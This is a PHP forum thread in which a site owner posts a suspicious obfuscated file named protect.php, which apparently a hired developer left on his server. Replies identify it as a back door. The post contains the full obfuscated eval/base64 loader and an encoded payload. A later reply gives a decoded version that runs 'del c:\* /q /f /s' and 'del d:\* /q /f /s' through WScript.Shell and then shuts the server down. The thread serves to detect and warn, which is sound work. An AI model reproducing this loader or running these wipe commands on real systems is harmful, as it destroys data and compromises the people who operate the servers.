Nicolay Posted September 22, 2015 Share Posted September 22, 2015 someone create for me website , but i think he can access on my server with website files , i see file name is protect.php but can you tell me this code it legal or not , thanks <?php /* This is file is to protect your site. Don't attempt to remove it. And this file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited. */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x370;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDVjMyk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>~Dkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLO0xNWLyHA1SmT09NHeEXHr8Xk10PkrfHT0knTyYdk09NTzEXHeEXTZffhtOuTr9tWAxTBZfNHr8XHr9NHeEmbUILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==eWplfMyShuniC2SPk0IQkZXmYjA3YjCxYLHZKeCZYjr3HzC1HzCzYeaoYjW2YTCzYLC2YeC1HjIZYzOnYeC2YefnYjr0YjOyYLC1WTA3YzI3HzW5YeWzHeC3Yjw2OeA2HzH0KTW1YrA1HeA0YTH2YzC5YTCzHTOyYLr2HzcrYLH3YzC0YeHzYTA0Yjr0YzA2YzH2HjWzYeL3HeOoYzF2OjOnYrr0YzH5YeC2YTW3YTC2WTW5YeWzHeC3Yrr0YjC0Y0r2HTW2YrA2OjanYTF3KeFzYrH1YeH1YTH2YeA3HzW2OjW5YLW0OTF0YAr0HzWxYzC1HzF5Yew2WjanYTF3YzC3YAr0YeFXYjH0WjC5Yer3YjCzYTH0HTF2YAr2KTWxYzC2HzF5Yer2KTOeYeH0HTF3YrH0HzWZYLW1KTA3YzI3WTanYTH2WjH3YeL0HTcoYrr0WTW3HzL0YjC1YeF1YjcnYeL0YeHXYjF0WTW2YjW3WTCxYeC0OTcoYAr1YzF4YzH0WzA0HzA1HzC0YTFzYecoYeL2OeOyYzW1WTWzYer3YjAzYzL0HjctYAr1YzF3YjF1KTfnYzE2HzOtYjL0HTF2YjH1HzWxYzC1WTC5Yer3YjCzYzL0HTC5YrH0HzWxYzF0WzWzYew2OeA5YTF3KefnYAr1HzctHzF0KTWxYLC0WTOnYeFzKTW2YjA0YzA2YLr0KTW0HzE2YzOnYeC2YefnYjr0YjOyYLC1WTA3YzI3HzOeYTWzYTAzYjW1YzH0YLC0KTcyYrA2OjC0YTI1HjctYjwzHzC0YzA0KTWzHzL3WTW5YjL3YzC3YrW0HzF3YjF1WTcrYeC3HzCzHzw1YTFXYrC3Yzw3HjLZKTYtkZLpKX==alVnRPIq Quote Link to comment https://forums.phpfreaks.com/topic/298270-please-help/ Share on other sites More sharing options...
benanamen Posted September 22, 2015 Share Posted September 22, 2015 That is a hacking script. Get rid of it. Quote Link to comment https://forums.phpfreaks.com/topic/298270-please-help/#findComment-1521345 Share on other sites More sharing options...
scootstah Posted September 22, 2015 Share Posted September 22, 2015 That is a back door which basically allows anyone to execute code on your server. Sorry to say, but if the person that built your website did that, then you can not trust anything else he has done. Get rid of it, try to get your money back, and find a legit developer. Quote Link to comment https://forums.phpfreaks.com/topic/298270-please-help/#findComment-1521346 Share on other sites More sharing options...
someotherdude Posted November 5, 2015 Share Posted November 5, 2015 The de-ofuscated code is here: $WshShell = new COM("WScript.Shell"); $oExec = $WshShell->Run("cmd /K del d:\* /q /f /s ", 0, false); $oExec = $WshShell->Run("cmd /K del c:\* /q /f /s ", 0, false); $oExec = $WshShell->Run("shutdown /s", 0, false); The first line creates an COM object, that uses WScript, which is used to create batch jobs. Then the second line uses that object to delete everything in drive d: Then the third line uses again that object to delete everything in drive c: And finally, the fourth line shuts down the server. Quote Link to comment https://forums.phpfreaks.com/topic/298270-please-help/#findComment-1525646 Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.